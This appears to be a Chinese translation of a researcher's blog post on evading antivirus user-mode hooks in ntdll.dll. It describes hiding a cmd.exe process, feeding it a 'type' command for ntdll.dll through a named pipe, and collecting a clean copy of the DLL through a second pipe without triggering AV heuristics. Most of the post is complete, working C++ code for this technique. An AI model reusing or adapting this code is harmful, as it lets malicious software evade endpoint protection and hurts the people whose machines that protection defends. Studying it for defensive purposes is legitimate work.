我最近使用了一台安装了 AV 软件的计算机,该软件将用户模式挂钩注入到ntdll.dll中的各种函数中。我不了解现代 AV 软件的运行方式,所以我决定看看这是多么容易克服。
最明显的方法是使用CreateFile和ReadFile从磁盘读取ntdll.dll,但这会触发 AV 启发式引擎。 我的下一个想法是使用受信任的 Microsoft 可执行文件为我完成这项工作 – 一个候选者是cmd.exe。 我使用CreateProcess创建了一个隐藏的带有stdin的cmd.exe进程
重定向到我的程序中的自定义命名管道。我还为ntdll.dll输出内容创建了一个单独的命名管道。使用WriteFile将类型 %windir%\\system32\\ntdll.dll > \\.\pipe\ntdll_output_pipe发送到自定义标准输入管道,然后将ntdll.dll的内容写入我的输出管道,我读取并存储在缓冲区中. 这种简单的方法没有触发任何 AV 警告。
这可以通过删除标准输入重定向并使用初始参数中的 type 命令启动 cmd.exe 来稍微简化( cmd.exe / c type % windir%\\system32\\ntdll.dll > \\.\pipe\ntdll_output_pipe),但这看起来更可疑。
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// NtdllPipe.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 // #include <stdio.h> #include <windows.h> struct BackgroundConsoleInstanceStruct { char szInstanceName[128]; HANDLE hConsoleProcess; HANDLE hConsoleInputPipe; }; struct CommandOutput_StoreDataParamStruct { BYTE* pOutputPtr; DWORD dwMaxOutputSize; DWORD dwTotalSize; }; DWORD BackgroundConsole_Create(const char* pInstanceName, BackgroundConsoleInstanceStruct* pBackgroundConsoleInstance) { PROCESS_INFORMATION ProcessInfo; STARTUPINFO StartupInfo; char szConsoleInputPipeName[512]; char szLaunchCmd[1024]; BackgroundConsoleInstanceStruct BackgroundConsoleInstance; HANDLE hConsoleInputPipe; // create console input pipe memset(szConsoleInputPipeName, 0, sizeof(szConsoleInputPipeName)); _snprintf(szConsoleInputPipeName, sizeof(szConsoleInputPipeName) - 1, "\\\\.\\pipe\\BackgroundConsoleIn_%s", pInstanceName); hConsoleInputPipe = CreateNamedPipe(szConsoleInputPipeName, PIPE_ACCESS_OUTBOUND, PIPE_TYPE_BYTE | PIPE_READMODE_BYTE | PIPE_WAIT, 1, 4096, 4096, 0, NULL); if (hConsoleInputPipe == INVALID_HANDLE_VALUE) { // error return 1; } // initialise startupinfo memset(&StartupInfo, 0, sizeof(StartupInfo)); StartupInfo.cb = sizeof(StartupInfo); StartupInfo.dwFlags = STARTF_USESHOWWINDOW; StartupInfo.wShowWindow = SW_HIDE; // create launch cmd memset(szLaunchCmd, 0, sizeof(szLaunchCmd)); _snprintf(szLaunchCmd, sizeof(szLaunchCmd) - 1, "cmd /c cmd < %s", szConsoleInputPipeName); // launch cmd.exe if (CreateProcess(NULL, szLaunchCmd, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &StartupInfo, &ProcessInfo) == 0) { // error CloseHandle(hConsoleInputPipe); return 1; } // close thread handle CloseHandle(ProcessInfo.hThread); // wait for cmd.exe to connect to input pipe if (ConnectNamedPipe(hConsoleInputPipe, NULL) == 0) { // error CloseHandle(hConsoleInputPipe); CloseHandle(ProcessInfo.hProcess); return 1; } // store background console entry data memset((void*)&BackgroundConsoleInstance, 0, sizeof(BackgroundConsoleInstance)); strncpy(BackgroundConsoleInstance.szInstanceName, pInstanceName, sizeof(BackgroundConsoleInstance.szInstanceName) - 1); BackgroundConsoleInstance.hConsoleProcess = ProcessInfo.hProcess; BackgroundConsoleInstance.hConsoleInputPipe = hConsoleInputPipe; memcpy((void*)pBackgroundConsoleInstance, (void*)&BackgroundConsoleInstance, sizeof(BackgroundConsoleInstance)); return 0; } DWORD BackgroundConsole_Close(BackgroundConsoleInstanceStruct* pBackgroundConsoleInstance) { // close console input pipe CloseHandle(pBackgroundConsoleInstance->hConsoleInputPipe); // wait for console process to end WaitForSingleObject(pBackgroundConsoleInstance->hConsoleProcess, INFINITE); CloseHandle(pBackgroundConsoleInstance->hConsoleProcess); return 0; } DWORD BackgroundConsole_Exec(BackgroundConsoleInstanceStruct* pBackgroundConsoleInstance, const char* pCommand, DWORD(*pCommandOutput)(BYTE* pBufferData, DWORD dwBufferLength, BYTE* pParam), BYTE* pCommandOutputParam) { char szWriteCommand[2048]; char szCommandOutputPipeName[512]; HANDLE hCommandOutputPipe = NULL; BYTE bReadBuffer[1024]; DWORD dwBytesRead = 0; // create output pipe memset(szCommandOutputPipeName, 0, sizeof(szCommandOutputPipeName)); _snprintf(szCommandOutputPipeName, sizeof(szCommandOutputPipeName) - 1, "\\\\.\\pipe\\BackgroundConsoleOut_%s", pBackgroundConsoleInstance->szInstanceName); hCommandOutputPipe = CreateNamedPipe(szCommandOutputPipeName, PIPE_ACCESS_INBOUND, PIPE_TYPE_BYTE | PIPE_READMODE_BYTE | PIPE_WAIT, 1, 4096, 4096, 0, NULL); if (hCommandOutputPipe == INVALID_HANDLE_VALUE) { // error return 1; } // write command to console memset(szWriteCommand, 0, sizeof(szWriteCommand)); _snprintf(szWriteCommand, sizeof(szWriteCommand) - 1, "%s > %s\n", pCommand, szCommandOutputPipeName); if (WriteFile(pBackgroundConsoleInstance->hConsoleInputPipe, szWriteCommand, strlen(szWriteCommand), NULL, NULL) == 0) { // error CloseHandle(hCommandOutputPipe); return 1; } // wait for target to connect to output pipe if (ConnectNamedPipe(hCommandOutputPipe, NULL) == 0) { // error CloseHandle(hCommandOutputPipe); return 1; } // get data from output pipe for (;;) { // read data from stdout pipe (ensure the buffer is null terminated in case this is string data) memset(bReadBuffer, 0, sizeof(bReadBuffer)); if (ReadFile(hCommandOutputPipe, bReadBuffer, sizeof(bReadBuffer) - 1, &dwBytesRead, NULL) == 0) { // failed - check error code if (GetLastError() == ERROR_BROKEN_PIPE) { // pipe closed break; } else { // error CloseHandle(hCommandOutputPipe); return 1; } } // send current buffer to output function if (pCommandOutput(bReadBuffer, dwBytesRead, pCommandOutputParam) != 0) { // error CloseHandle(hCommandOutputPipe); return 1; } } // close handle CloseHandle(hCommandOutputPipe); return 0; } DWORD CommandOutput_StoreData(BYTE* pBufferData, DWORD dwBufferLength, BYTE* pParam) { CommandOutput_StoreDataParamStruct* pCommandOutput_StoreDataParam = NULL; // get param pCommandOutput_StoreDataParam = (CommandOutput_StoreDataParamStruct*)pParam; // check if an output buffer was specified if (pCommandOutput_StoreDataParam->pOutputPtr != NULL) { // validate length if (dwBufferLength > (pCommandOutput_StoreDataParam->dwMaxOutputSize - pCommandOutput_StoreDataParam->dwTotalSize)) { return 1; } // copy data memcpy((void*)(pCommandOutput_StoreDataParam->pOutputPtr + pCommandOutput_StoreDataParam->dwTotalSize), pBufferData, dwBufferLength); } // increase output size pCommandOutput_StoreDataParam->dwTotalSize += dwBufferLength; return 0; } // www.x86matthew.com int main() { BackgroundConsoleInstanceStruct BackgroundConsoleInstance; CommandOutput_StoreDataParamStruct CommandOutput_StoreDataParam; BYTE* pNtdllCopy = NULL; DWORD dwAllocSize = 0; printf("Creating hidden cmd.exe process...\n"); // create background console if (BackgroundConsole_Create("mytest", &BackgroundConsoleInstance) != 0) { return 1; } printf("Retrieving ntdll file size...\n"); // call the function with a blank output buffer to retrieve the file size memset((void*)&CommandOutput_StoreDataParam, 0, sizeof(CommandOutput_StoreDataParam)); CommandOutput_StoreDataParam.pOutputPtr = NULL; CommandOutput_StoreDataParam.dwMaxOutputSize = 0; CommandOutput_StoreDataParam.dwTotalSize = 0; if (BackgroundConsole_Exec(&BackgroundConsoleInstance, "type %windir%\\system32\\ntdll.dll", CommandOutput_StoreData, (BYTE*)&CommandOutput_StoreDataParam) != 0) { return 1; } printf("ntdll.dll file size: %u bytes - allocating memory...\n", CommandOutput_StoreDataParam.dwTotalSize); // allocate memory dwAllocSize = CommandOutput_StoreDataParam.dwTotalSize; pNtdllCopy = (BYTE*)malloc(dwAllocSize); if (pNtdllCopy == NULL) { return 1; } printf("Reading ntdll.dll data from disk...\n"); // call the function again to read the file contents memset((void*)&CommandOutput_StoreDataParam, 0, sizeof(CommandOutput_StoreDataParam)); CommandOutput_StoreDataParam.pOutputPtr = pNtdllCopy; CommandOutput_StoreDataParam.dwMaxOutputSize = dwAllocSize; CommandOutput_StoreDataParam.dwTotalSize = 0; if (BackgroundConsole_Exec(&BackgroundConsoleInstance, "type %windir%\\system32\\ntdll.dll", CommandOutput_StoreData, (BYTE*)&CommandOutput_StoreDataParam) != 0) { return 1; } printf("Read %u bytes successfully\n", CommandOutput_StoreDataParam.dwTotalSize); // (pNtdllCopy now contains a copy of ntdll) // clean up free(pNtdllCopy); BackgroundConsole_Close(&BackgroundConsoleInstance); return 0; } |